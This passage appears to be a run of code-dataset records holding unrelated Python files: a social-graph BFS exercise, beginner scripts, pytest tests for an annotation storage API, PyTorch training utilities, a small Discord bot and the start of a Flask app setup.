visited\n visited[last_id] = path\n # Enqueue all it's neighbors to back of the queue\n for friend_id in self.friendships[last_id]:\n # MAKE A COPY OF THE PATH\n copy = path.copy()\n # ADD NEIGHBOR TO BACK OF PATH\n copy.append(friend_id)\n # ENQUEUE THE COPY\n q.enqueue(copy)\n return visited\n\n\n# 1. To create 100 users with an average of 10 friends each, how many\n# times would you need to call `add_friendship()`? Why?\n#\n# A: 100 * 10 // 2 = 500\n\n# 2. If you create 1000 users with an average of 5 random friends\n# each, what percentage of other users will be in a particular\n# user's extended social network?\n#\n# A: Running a test of:\n# sg = SocialGraph()\n# sg.populate_graph(1000, 5)\n# connections = sg.get_all_social_paths(1)\n# print(len(connections) / 1000)\n#\n# Answer = 0.99\n#\n# What is the average degree of separation between a user and\n# those in his/her extended network?\n#\n# A: Running a test of:\n# sg = SocialGraph()\n# sg.populate_graph(1000, 5)\n# connections = sg.get_all_social_paths(1)\n# print(len(connections) / 1000)\n# total = 0\n# for path in connections.values():\n# total += len(path)\n# print(f\"Avg degrees of separation = {total / len(connections) - 1}\")\n#\n# Answer = ~4.5\n\n# 3. You might have found the results from question #2 above to be\n# surprising. Would you expect results like this in real life?\n#\n# A: No.\n#\n# If not, what are some ways you could improve your friendship\n# distribution model for more realistic results?\n#\n# A: Use a Voronoi algorithm that accounts for clustering.\n\n# 4. If you followed the hints for part 1, your `populate_graph()` will\n# run in O(n^2) time. Refactor your code to run in O(n) time. Are\n# there any tradeoffs that come with this implementation?\n#\n# A: After a certain density, Linear Populate takes much longer\n# to populate because of collisions.\n\n\nif __name__ == '__main__':\n # sg = SocialGraph()\n # sg.populate_graph(10, 2)\n # print(sg.friendships)\n # connections = sg.get_all_social_paths(1)\n # print(connections)\n\n num_users = 2000\n avg_friendships = 400\n sg = SocialGraph()\n start_time = time.time()\n sg.populate_graph(num_users, avg_friendships)\n end_time = time.time()\n print(\"\\n\\n-----\")\n print(f\"Quadratic populate: {end_time - start_time} seconds\")\n print(\"-----\\n\\n\")\n\n sg = SocialGraph()\n start_time = time.time()\n sg.populate_graph_linear(num_users, avg_friendships)\n end_time = time.time()\n print(f\"Linear populate: {end_time - start_time} seconds\")\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202783077","text":"#Multiple If statements in Succession\n\nprint(\"Welcome to the RollerCoster Ride\")\n\nheight = float(input(\"Please enter your height in cm: \"))\nbill_amount = 0\n\nif height >= 120:\n print(\"You are eligible for the ride\")\n age = int(input(\"Enter your age: \"))\n if age < 12:\n bill = 10\n print(\"You require a Child fee of RS 10\")\n elif age <=18:\n bill = 20\n print(\"You require a Teenage fee of RS 20\")\n else:\n bill = 30\n print(\"You require an Adult fee of RS 30\")\n \n require_photos = input(\"Please say 'Y' if you need the photos or else please mention 'N': \")\n if require_photos == \"Y\":\n bill +=3\n\n print(f\"Your final bill is {bill}\")\n\nelse:\n print(\"You are not eligible for the ride\")\n","sub_path":"day_3-5.py","file_name":"day_3-5.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334920407","text":"# ------------------------------------\n# Dictionary comprehension\n# { arg : arg for arg in arg}\n#\n# - iterates over keys by default\n# - to iterate over keys and values use .items()\n# ------------------------------------\n\n# example 1\n\nnumbers = dict(first=1, second=2, third=3)\n\nsquared_numbers = {key: value ** 2 for key,value in numbers.items()}\n\nprint(squared_numbers) # {'first': 1, 'second': 4, 'third': 9}\n\n# example 2\n{num: num**2 for num in [1,2,3,4,5]}\n\n# example 3\nstr1 = \"ABC\"\nstr2 = \"123\"\ncombo = {str1[i]: str2[i] for i in range(0,len(str1))}\nprint(combo) # {'A': '1', 'B': '2', 'C': '3'}","sub_path":"notes/dictcomp.py","file_name":"dictcomp.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58726548","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport copy\n\nimport pytest\nimport mock\nfrom mock import patch\nfrom pyramid.testing import DummyRequest\n\nfrom h import db\nfrom h.api import storage\nfrom h.api import schemas\nfrom h.api.models.annotation import Annotation\nfrom h.api.models.document import Document, DocumentURI\n\n\nclass TestFetchAnnotation(object):\n\n def test_elastic(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n models.elastic.Annotation.fetch.return_value = mock.Mock()\n\n actual = storage.fetch_annotation(DummyRequest(), '123')\n\n models.elastic.Annotation.fetch.assert_called_once_with('123')\n assert models.elastic.Annotation.fetch.return_value == actual\n\n def test_postgres(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n annotation = Annotation(userid='luke')\n db.Session.add(annotation)\n db.Session.flush()\n\n actual = storage.fetch_annotation(request, annotation.id)\n assert annotation == actual\n\n def test_it_uses_postgres_if_postgres_arg_is_True(self, postgres_enabled):\n \"\"\"If postgres=True it uses postgres even if feature flag is off.\"\"\"\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = False # The feature flag is off.\n annotation = Annotation(userid='luke')\n db.Session.add(annotation)\n db.Session.flush()\n\n actual = storage.fetch_annotation(\n request, annotation.id, _postgres=True)\n\n assert annotation == actual\n\n def test_it_uses_elastic_if_postgres_arg_is_False(self,\n postgres_enabled,\n models):\n \"\"\"If postgres=False it uses elastic even if the feature flag is on.\"\"\"\n postgres_enabled.return_value = True # The feature flag is on.\n models.elastic.Annotation.fetch.return_value = mock.Mock()\n\n actual = storage.fetch_annotation(\n DummyRequest(), '123', _postgres=False)\n\n models.elastic.Annotation.fetch.assert_called_once_with('123')\n assert models.elastic.Annotation.fetch.return_value == actual\n\n\nclass TestExpandURI(object):\n\n def test_expand_uri_postgres_no_document(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n actual = storage.expand_uri(request, 'http://example.com/')\n assert actual == ['http://example.com/']\n\n def test_expand_uri_elastic_no_document(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n request = DummyRequest()\n models.elastic.Document.get_by_uri.return_value = None\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_postgres_document_doesnt_expand_canonical_uris(\n self,\n postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n document = Document(document_uris=[\n DocumentURI(uri='http://foo.com/', claimant='http://example.com'),\n DocumentURI(uri='http://bar.com/', claimant='http://example.com'),\n DocumentURI(uri='http://example.com/', type='rel-canonical',\n claimant='http://example.com'),\n ])\n db.Session.add(document)\n db.Session.flush()\n\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_elastic_document_doesnt_expand_canonical_uris(\n self,\n postgres_enabled,\n models):\n postgres_enabled.return_value = False\n\n request = DummyRequest()\n document = models.elastic.Document.get_by_uri.return_value\n type(document).document_uris = uris = mock.PropertyMock()\n uris.return_value = [\n mock.Mock(uri='http://foo.com/'),\n mock.Mock(uri='http://bar.com/'),\n mock.Mock(uri='http://example.com/', type='rel-canonical'),\n ]\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://example.com/\"]\n\n def test_expand_uri_postgres_document_uris(self, postgres_enabled):\n request = DummyRequest(db=db.Session)\n postgres_enabled.return_value = True\n\n document = Document(document_uris=[\n DocumentURI(uri='http://foo.com/', claimant='http://bar.com'),\n DocumentURI(uri='http://bar.com/', claimant='http://bar.com'),\n ])\n db.Session.add(document)\n db.Session.flush()\n\n assert storage.expand_uri(request, 'http://foo.com/') == [\n 'http://foo.com/',\n 'http://bar.com/'\n ]\n\n def test_expand_uri_elastic_document_uris(self, postgres_enabled, models):\n postgres_enabled.return_value = False\n request = DummyRequest()\n document = models.elastic.Document.get_by_uri.return_value\n type(document).document_uris = uris = mock.PropertyMock()\n uris.return_value = [\n mock.Mock(uri=\"http://foo.com/\"),\n mock.Mock(uri=\"http://bar.com/\"),\n ]\n assert storage.expand_uri(request, \"http://example.com/\") == [\n \"http://foo.com/\",\n \"http://bar.com/\",\n ]\n\n\n@pytest.mark.usefixtures('AnnotationBeforeSaveEvent',\n 'models', # Don't try to talk to real Elasticsearch!\n 'partial',\n 'transform')\nclass TestLegacyCreateAnnotation(object):\n\n def test_it_inits_an_elastic_annotation_model(self, models):\n data = self.annotation_data()\n\n storage.legacy_create_annotation(self.mock_request(), data)\n\n models.elastic.Annotation.assert_called_once_with(data)\n\n def test_it_calls_partial(self, partial):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n partial.assert_called_once_with(\n storage.fetch_annotation, request, _postgres=False)\n\n def test_it_calls_prepare(self, models, partial, transform):\n storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n transform.prepare.assert_called_once_with(\n models.elastic.Annotation.return_value, partial.return_value)\n\n def test_it_inits_AnnotationBeforeSaveEvent(self,\n AnnotationBeforeSaveEvent,\n models):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n AnnotationBeforeSaveEvent.assert_called_once_with(\n request, models.elastic.Annotation.return_value)\n\n def test_it_calls_notify(self, AnnotationBeforeSaveEvent):\n request = self.mock_request()\n\n storage.legacy_create_annotation(request, self.annotation_data())\n\n request.registry.notify.assert_called_once_with(\n AnnotationBeforeSaveEvent.return_value)\n\n def test_it_calls_annotation_save(self, models):\n storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n\n models.elastic.Annotation.return_value.save.assert_called_once_with()\n\n def test_it_returns_the_annotation(self, models):\n result = storage.legacy_create_annotation(self.mock_request(),\n self.annotation_data())\n\n assert result == models.elastic.Annotation.return_value\n\n def mock_request(self):\n request = DummyRequest(feature=mock.Mock(spec=lambda feature: False,\n return_value=False))\n request.registry.notify = mock.Mock(spec=lambda event: None)\n return request\n\n def annotation_data(self):\n return {'foo': 'bar'}\n\n @pytest.fixture\n def AnnotationBeforeSaveEvent(self, request):\n patcher = patch('h.api.storage.AnnotationBeforeSaveEvent',\n autospec=True)\n AnnotationBeforeSaveEvent = patcher.start()\n request.addfinalizer(patcher.stop)\n return AnnotationBeforeSaveEvent\n\n @pytest.fixture\n def partial(self, request):\n patcher = patch('h.api.storage.partial', autospec=True)\n partial = patcher.start()\n request.addfinalizer(patcher.stop)\n return partial\n\n @pytest.fixture\n def transform(self, request):\n patcher = patch('h.api.storage.transform', autospec=True)\n transform = patcher.start()\n request.addfinalizer(patcher.stop)\n return transform\n\n\n@pytest.mark.usefixtures('fetch_annotation',\n 'models')\nclass TestCreateAnnotation(object):\n\n def test_it_fetches_parent_annotation_for_replies(self,\n authn_policy,\n fetch_annotation):\n request = self.mock_request()\n\n # Make the annotation's parent belong to 'test-group'.\n fetch_annotation.return_value.groupid = 'test-group'\n\n # The request will need permission to write to 'test-group'.\n authn_policy.effective_principals.return_value = ['group:test-group']\n\n data = self.annotation_data()\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n storage.create_annotation(request, data)\n\n fetch_annotation.assert_called_once_with(request,\n 'parent_annotation_id',\n _postgres=True)\n\n def test_it_sets_group_for_replies(self,\n authn_policy,\n fetch_annotation,\n models):\n # Make the annotation's parent belong to 'test-group'.\n fetch_annotation.return_value.groupid = 'test-group'\n\n # The request will need permission to write to 'test-group'.\n authn_policy.effective_principals.return_value = ['group:test-group']\n\n data = self.annotation_data()\n assert data['groupid'] != 'test-group'\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n storage.create_annotation(self.mock_request(), data)\n\n assert models.Annotation.call_args[1]['groupid'] == 'test-group'\n\n def test_it_raises_if_parent_annotation_does_not_exist(self,\n fetch_annotation):\n fetch_annotation.return_value = None\n\n data = self.annotation_data()\n\n # The annotation is a reply.\n data['references'] = ['parent_annotation_id']\n\n with pytest.raises(schemas.ValidationError) as err:\n storage.create_annotation(self.mock_request(), data)\n\n assert str(err.value).startswith('references.0: ')\n\n def test_it_raises_if_user_does_not_have_permissions_for_group(self):\n data = self.annotation_data()\n data['groupid'] = 'foo-group'\n\n with pytest.raises(schemas.ValidationError) as err:\n storage.create_annotation(self.mock_request(), data)\n\n assert str(err.value).startswith('group: ')\n\n def test_it_inits_an_Annotation_model(self, models):\n data = self.annotation_data()\n\n storage.create_annotation(self.mock_request(), copy.deepcopy(data))\n\n del data['document']\n models.Annotation.assert_called_once_with(**data)\n\n def test_it_adds_the_annotation_to_the_database(self, models):\n request = self.mock_request()\n\n storage.create_annotation(request, self.annotation_data())\n\n request.db.add.assert_called_once_with(models.Annotation.return_value)\n\n def test_it_calls_find_or_create_by_uris(self, models):\n request = self.mock_request()\n annotation = models.Annotation.return_value\n annotation_data = self.annotation_data()\n annotation_data['document']['document_uri_dicts'] = [\n {\n 'uri': 'http://example.com/example_1',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_2',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_3',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n ]\n\n storage.create_annotation(request, annotation_data)\n\n models.Document.find_or_create_by_uris.assert_called_once_with(\n request.db,\n annotation.target_uri,\n [\n 'http://example.com/example_1',\n 'http://example.com/example_2',\n 'http://example.com/example_3',\n ],\n created=annotation.created,\n updated=annotation.updated,\n )\n\n def test_it_calls_merge_documents(self, models):\n \"\"\"If it finds more than one document it calls merge_documents().\"\"\"\n models.Document.find_or_create_by_uris.return_value = mock.Mock(\n count=mock.Mock(return_value=3))\n request = self.mock_request()\n\n storage.create_annotation(request, self.annotation_data())\n\n models.merge_documents.assert_called_once_with(\n request.db,\n models.Document.find_or_create_by_uris.return_value,\n updated=models.Annotation.return_value.updated,\n )\n\n def test_it_calls_first(self, models):\n \"\"\"If it finds only one document it calls first().\"\"\"\n models.Document.find_or_create_by_uris.return_value = mock.Mock(\n count=mock.Mock(return_value=1))\n\n storage.create_annotation(self.mock_request(), self.annotation_data())\n\n models.Document.find_or_create_by_uris.return_value\\\n .first.assert_called_once_with()\n\n def test_it_updates_document_updated(self, models):\n yesterday = \"yesterday\"\n document = models.merge_documents.return_value = mock.Mock(\n updated=yesterday)\n models.Document.find_or_create_by_uris.return_value.first\\\n .return_value = document\n\n storage.create_annotation(self.mock_request(), self.annotation_data())\n\n assert document.updated == models.Annotation.return_value.updated\n\n def test_it_calls_create_or_update_document_uri(\n self,\n models):\n models.Document.find_or_create_by_uris.return_value.count\\\n .return_value = 1\n\n request = self.mock_request()\n\n annotation = models.Annotation.return_value\n\n annotation_data = self.annotation_data()\n annotation_data['document']['document_uri_dicts'] = [\n {\n 'uri': 'http://example.com/example_1',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_2',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n {\n 'uri': 'http://example.com/example_3',\n 'claimant': 'http://example.com/claimant',\n 'type': 'type',\n 'content_type': None,\n },\n ]\n\n storage.create_annotation(request, copy.deepcopy(annotation_data))\n\n assert models.create_or_update_document_uri.call_count == 3\n for doc_uri_dict in annotation_data['document']['document_uri_dicts']:\n models.create_or_update_document_uri.assert_any_call(\n session=request.db,\n document=models.Document.find_or_create_by_uris.return_value.first.return_value,\n created=annotation.created,\n updated=annotation.updated,\n **doc_uri_dict\n )\n\n def test_it_calls_create_or_update_document_meta(self, models):\n models.Document.find_or_create_by_uris.return_value.count\\\n .return_value = 1\n\n request = self.mock_request()\n\n annotation = models.Annotation.return_value\n\n annotation_data = self.annotation_data()\n annotation_data['document']['document_meta_dicts'] = [\n {\n 'claimant': 'http://example.com/claimant',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'type': 'title',\n 'value': 'foo',\n },\n {\n 'type': 'article title',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'value': 'bar',\n 'claimant': 'http://example.com/claimant',\n },\n {\n 'type': 'site title',\n 'claimant_normalized':\n 'http://example.com/claimant_normalized',\n 'value': 'gar',\n 'claimant': 'http://example.com/claimant',\n },\n ]\n\n storage.create_annotation(request, copy.deepcopy(annotation_data))\n\n assert models.create_or_update_document_meta.call_count == 3\n for document_meta_dict in annotation_data['document'][\n 'document_meta_dicts']:\n models.create_or_update_document_meta.assert_any_call(\n session=request.db,\n document=models.Document.find_or_create_by_uris.return_value.first.return_value,\n created=annotation.created,\n updated=annotation.updated,\n **document_meta_dict\n )\n\n def test_it_returns_the_annotation(self, models):\n annotation = storage.create_annotation(self.mock_request(),\n self.annotation_data())\n\n assert annotation == models.Annotation.return_value\n\n def test_it_does_not_crash_if_target_selectors_is_empty(self):\n # Page notes have [] for target_selectors.\n data = self.annotation_data()\n data['target_selectors'] = []\n\n storage.create_annotation(self.mock_request(), data)\n\n def test_it_does_not_crash_if_no_text_or_tags(self):\n # Highlights have no text or tags.\n data = self.annotation_data()\n data['text'] = data['tags'] = ''\n\n storage.create_annotation(self.mock_request(), data)\n\n def mock_request(self):\n request = DummyRequest(\n feature=mock.Mock(\n side_effect=lambda flag: flag == \"postgres_write\"),\n authenticated_userid='acct:test@localhost'\n )\n\n request.registry.notify = mock.Mock(spec=lambda event: None)\n\n class DBSpec(object):\n def add(self, annotation):\n pass\n def flush():\n pass\n request.db = mock.Mock(spec=DBSpec)\n\n return request\n\n def annotation_data(self):\n return {\n 'userid': 'acct:test@localhost',\n 'text': 'text',\n 'tags': ['one', 'two'],\n 'shared': False,\n 'target_uri': 'http://www.example.com/example.html',\n 'groupid': '__world__',\n 'references': [],\n 'target_selectors': ['selector_one', 'selector_two'],\n 'document': {\n 'document_uri_dicts': [],\n 'document_meta_dicts': [],\n }\n }\n\n @pytest.fixture\n def fetch_annotation(self, request):\n patcher = patch('h.api.storage.fetch_annotation', autospec=True)\n fetch_annotation = patcher.start()\n request.addfinalizer(patcher.stop)\n return fetch_annotation\n\n\n@pytest.fixture\ndef document_model(config, request):\n patcher = patch('h.api.models.elastic.Document', autospec=True)\n module = patcher.start()\n request.addfinalizer(patcher.stop)\n return module\n\n\n@pytest.fixture\ndef models(request):\n patcher = patch('h.api.storage.models')\n models = patcher.start()\n models.Annotation.return_value.is_reply = False\n request.addfinalizer(patcher.stop)\n return models\n\n\n@pytest.fixture\ndef postgres_enabled(request):\n patcher = patch('h.api.storage._postgres_enabled', autospec=True)\n func = patcher.start()\n request.addfinalizer(patcher.stop)\n return func\n","sub_path":"h/api/test/storage_test.py","file_name":"storage_test.py","file_ext":"py","file_size_in_byte":20751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"8563850","text":"from pathlib import Path\nfrom collections import defaultdict\nfrom pprint import pprint\nimport random\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim, tensor\n\nfrom .iters import flatten\n\n\nclass TensorBatcher():\n \"\"\"Simple combination of a TensorDataset and a DataLoader, but\n faster due to less overhead.\"\"\"\n def __init__(\n self, X, Y=None, *, batch_size=64, shuffle=True):\n self.X = X\n if Y is not None:\n assert X.size(0) == Y.size(0)\n self.Y = Y\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def __iter__(self):\n if self.shuffle:\n get_idxs = torch.randperm\n else:\n get_idxs = torch.arange\n b_idxs = get_idxs(self.X.size(0)).to(self.X.device)\n if self.Y is not None:\n assert self.X.device == self.Y.device\n yield from zip(\n self.X[b_idxs].split(self.batch_size),\n self.Y[b_idxs].split(self.batch_size))\n else:\n yield from self.X[b_idxs].split(self.batch_size)\n\n def __len__(self):\n return (self.X.size(0) - 1) // self.batch_size + 1\n\n\nclass LengthBatcher():\n \"\"\"Splits variable-length instances in X and Y into batches,\n according to their length. Instances in a batch have the same length,\n as determined by get_len. Instances in different batches may have\n different lengths.\"\"\"\n\n def __init__(\n self, X, Y=None, batch_size=100,\n get_len=lambda x: x[1] - x[0], keys=None,\n start_ends=False, log=None):\n self.X = X\n self.Y = Y\n self.device = self.X.device\n if self.Y is not None:\n assert self.X.device == self.Y.device\n self.batch_size = batch_size\n if start_ends:\n keys = X[:, 1] - X[:, 0]\n if keys is None:\n len2idxs = defaultdict(list)\n for idx in range(len(X)):\n len2idxs[get_len(X[idx])].append(idx)\n self.len2idxs = {\n l: tensor(idxs, dtype=torch.int64, device=self.device)\n for l, idxs in len2idxs.items()}\n self.lengths = np.array(list(self.len2idxs.keys()))\n self.multilen = self.lengths.ndim > 1\n else:\n self.lengths = list(set(keys.cpu().tolist()))\n self.len2idxs = {\n l: torch.nonzero(keys == l).squeeze()\n for l in self.lengths}\n self.multilen = False\n if log:\n log.info(f\"{len(self)} batches. batch size: {self.batch_size}\")\n\n def __iter__(self):\n if self.Y is not None:\n if self.multilen:\n raise NotImplementedError\n else:\n yield from self.iter_XY()\n else:\n if self.multilen:\n yield from self.iter_X_multi()\n else:\n yield from self.iter_X()\n\n def __len__(self):\n return sum(\n len(idxs.split(self.batch_size))\n for idxs in self.len2idxs.values())\n\n def iter_XY(self):\n np.random.shuffle(self.lengths)\n for length in self.lengths:\n idxs = self.len2idxs[length]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs], self.Y[batch_idxs]\n\n def iter_X(self):\n np.random.shuffle(self.lengths)\n for length in self.lengths:\n idxs = self.len2idxs[length]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs]\n\n def iter_X_multi(self):\n np.random.shuffle(self.lengths)\n for lengths in self.lengths:\n idxs = self.len2idxs[tuple(lengths)]\n shuf_idxs = torch.randperm(idxs.shape[0]).to(self.device)\n for batch_idxs in idxs[shuf_idxs].split(self.batch_size):\n yield self.X[batch_idxs]\n\n def print_stats(self):\n pprint(self.stats)\n\n @property\n def stats(self):\n return {l: idxs.shape[0] for l, idxs in self.len2idxs.items()}\n\n\ndef save_model(model, model_file, log=None):\n \"\"\"Save a pytorch model to model_file.\"\"\"\n if isinstance(model_file, str):\n model_file = Path(model_file)\n model_file.parent.mkdir(parents=True, exist_ok=True)\n with model_file.open(\"wb\") as out:\n torch.save(model.state_dict(), out)\n if log:\n log.info(\"saved %s\", model_file)\n\n\ndef load_model(model, model_file):\n \"\"\"Load model weights from model_file.\"\"\"\n model.load_state_dict(torch.load(model_file))\n\n\ndef emb_layer(keyed_vectors, trainable=False, use_weights=True, **kwargs):\n \"\"\"Create an Embedding layer from a gensim KeyedVectors instance.\"\"\"\n emb_weights = tensor(keyed_vectors.syn0)\n emb = nn.Embedding(*emb_weights.shape, **kwargs)\n if use_weights:\n emb.weight = nn.Parameter(emb_weights)\n emb.weight.requires_grad = trainable\n return emb\n\n\nclass Score():\n \"\"\"Keep track of a score computed by score_func, save model\n if score improves.\n \"\"\"\n def __init__(\n self, name, score_func=None, shuffle_baseline=False,\n comp=float.__gt__):\n self.name = name\n if comp == float.__lt__:\n self.current = float(\"inf\")\n self.best = float(\"inf\")\n else:\n self.current = 0.0\n self.best = 0.0\n self.best_model = None\n self.pred = []\n self.true = []\n self.shuffle = []\n self.score_func = score_func\n self.shuffle_baseline = shuffle_baseline\n self.comp = comp\n\n def extend(self, pred, true):\n \"\"\"append predicted and true labels\"\"\"\n self.pred.extend(pred)\n self.true.extend(true)\n\n def update(self, model=None, rundir=None, epoch=None, score=None):\n if score is None:\n score = self.score_func(self.true, self.pred)\n self.current_score = score\n if self.comp(score, self.best):\n self.best = score\n if model:\n assert rundir\n epoch_str = f\"e{epoch}_\" if epoch is not None else \"\"\n fname = f\"{epoch_str}{self.name}_{score:.4f}_model.pt\"\n model_file = rundir / fname\n save_model(model, model_file)\n self.best_model = model_file\n if self.shuffle_baseline:\n random.shuffle(self.pred)\n shuffle_score = self.score_func(self.true, self.pred)\n else:\n shuffle_score = None\n self.true = []\n self.pred = []\n return score, shuffle_score\n\n def update_log(\n self, model=None, rundir=None, epoch=None, score=None, log=None):\n score, shuffle_score = self.update(\n model=model, rundir=rundir, epoch=epoch, score=score)\n s = f\"score {self.name}_{score:.4f}/{self.best:.4f}\\n{self.best_model}\"\n if shuffle_score is not None:\n s += f\"\\nshuffle {self.name}_{shuffle_score:.4f}\"\n if log:\n log.info(s)\n else:\n print(s)\n\n @property\n def best_str(self):\n return f\"{self.name}_{self.best:.4f}\"\n\n @property\n def current_str(self):\n return f\"{self.name}_{self.current_score:.4f}\"\n\n\nclass LossTracker(list):\n \"\"\"Keep track of losses, save model if loss improves.\"\"\"\n def __init__(self, name):\n self.name = name\n self.best_loss = defaultdict(lambda: float(\"inf\"))\n self.best_model = None\n\n def interval_end(\n self, epoch=None, model=None, model_file=None, ds_name=None):\n loss = np.average(self)\n print(loss, self.best_loss[ds_name])\n if loss < self.best_loss[ds_name]:\n self.best_loss[ds_name] = loss\n if model:\n model_file = Path(str(model_file).format(\n epoch=epoch,\n ds_name=ds_name,\n loss=loss))\n save_model(model, model_file)\n self.best_model = model_file\n self.clear()\n return loss\n\n\nclass LossTrackers():\n \"\"\"Keep track of multiple losses.\"\"\"\n def __init__(self, *loss_trackers):\n self.loss_trackers = loss_trackers\n\n def append(self, *losses):\n for lt, loss in zip(self.loss_trackers, losses):\n lt.append(loss.item())\n\n def interval_end(\n self, *, epoch=None, model=None, model_file=None, ds_name=None):\n for lt in self.loss_trackers:\n yield (\n lt.name,\n lt.interval_end(\n epoch=epoch,\n model=model, model_file=model_file, ds_name=ds_name),\n lt.best_loss[ds_name])\n\n def interval_end_log(\n self, epoch, *, model=None, model_file=None, ds_name=None):\n print(f\"e{epoch} {ds_name} \" + \" \".join(\n f\"{name}_{loss:.4f}/{best:.4f}\"\n for name, loss, best in self.interval_end(\n epoch=epoch,\n model=model, model_file=model_file, ds_name=ds_name)))\n\n def best_log(self):\n print(\"best: \" + \" \".join(\n f\"{lt.name}_{lt.best_loss:.6f}\" for lt in self.loss_trackers))\n\n @staticmethod\n def from_names(*names):\n return LossTrackers(*map(LossTracker, names))\n\n def __iter__(self):\n return iter(self.loss_trackers)\n\n def __getitem__(self, i):\n return self.loss_trackers[i]\n\n\ndef get_optim(args, model):\n \"\"\"Create an optimizer according to command line args.\"\"\"\n params = [p for p in model.parameters() if p.requires_grad]\n if args.optim.lower() == \"adam\":\n return optim.Adam(params, lr=args.learning_rate)\n elif args.optim.lower() == \"sgd\":\n return optim.SGD(params, lr=args.learning_rate, momentum=args.momentum)\n raise ValueError(\"Unknown optimizer: \" + args.optim)\n\n\ndef tensorize_varlen_items(\n items, device=\"cuda\",\n item_dtype=torch.int64,\n startends_dtype=torch.int64):\n \"\"\"Tensorize variable-length items, e.g. a list of sentences in,\n a document with each sentence being a list of word indexes.\n This is done by creating a 'store' vector which contains the items\n in sequential order (e.g., word indexes as they occur in the document),\n and a 'startends' tensor which contains the start and end offsets of\n each item (e.g. the start and end offset of each sentence).\"\"\"\n store = torch.tensor(list(flatten(items)), device=device, dtype=item_dtype)\n lengths = list(map(len, items))\n starts = np.cumsum([0] + lengths[:-1])\n ends = np.cumsum(lengths)\n startends = np.stack([starts, ends]).T\n startends = torch.tensor(startends, device=device, dtype=startends_dtype)\n return store, startends\n","sub_path":"dougu/torchutil.py","file_name":"torchutil.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"8499172","text":"import os\nimport random\nfrom discord.ext import commands\n\nTOKEN = os.environ.get('DISCORD_TOKEN')\n\n# prefix for bot will be a ? mark\nbot = commands.Bot(command_prefix='?')\n\n\n# shows connection\n@bot.event\nasync def on_ready():\n print(f\"{bot.user.name} has connected to discord.\")\n\n\n# no command here\n# greetings to people joining server\n@bot.event\nasync def on_member_join(member):\n await member.create_dm()\n await member.dm_channel.send(\n f\"Hi {member.name}, welcome to my Discord server.\"\n )\n\n\n# using command here\n# recommend a gacha game\n@bot.command(name=\"gacha\", help=\"Just a few gacha games I've been recommended.\")\nasync def recommendations(ctx):\n gacha_games = [\n \"Azur Lane\",\n \"Fate Grand Order\",\n \"Arknights\"\n ]\n\n response = random.choice(gacha_games)\n await ctx.send(f'Try {response}')\n\n\nbot.run(TOKEN)\n","sub_path":"bot_v2_with_commands.py","file_name":"bot_v2_with_commands.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264197737","text":"import os\n\nfrom flask import Flask\nfrom flaskext.cache import Cache\n\nfrom kardboard.util import (\n PortAwareMongoEngine,\n slugify,\n timesince,\n jsonencode,\n configure_logging,\n newrelic_head,\n newrelic_foot,\n FixGunicorn\n)\n\n\ndef get_app():\n app = Flask('kardboard')\n app.config.from_object('kardboard.default_settings')\n if os.getenv('KARDBOARD_SETTINGS', None):\n app.config.from_envvar('KARDBOARD_SETTINGS')\n\n app.secret_key = app.config['SECRET_KEY']\n\n app.db = PortAwareMongoEngine(app)\n\n app.jinja_env.add_extension('kardboard.util.Markdown2Extension')\n app.jinja_env.filters['slugify'] = slugify\n app.jinja_env.filters['timesince'] = timesince\n app.jinja_env.filters['jsonencode'] = jsonencode\n app.jinja_env.globals['newrelic_head'] = newrelic_head\n app.jinja_env.globals['newrelic_foot'] = newrelic_foot\n\n configure_logging(app)\n\n try:\n from flaskext.exceptional import Exceptional\n except ImportError:\n pass\n exceptional_key = 